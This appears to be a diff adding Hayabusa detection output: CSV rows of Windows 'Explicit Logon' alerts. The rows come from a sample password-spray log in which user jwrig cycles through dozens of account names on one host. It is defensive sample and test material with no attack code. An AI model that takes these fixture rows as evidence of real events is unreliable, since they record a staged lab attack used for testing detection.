+2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
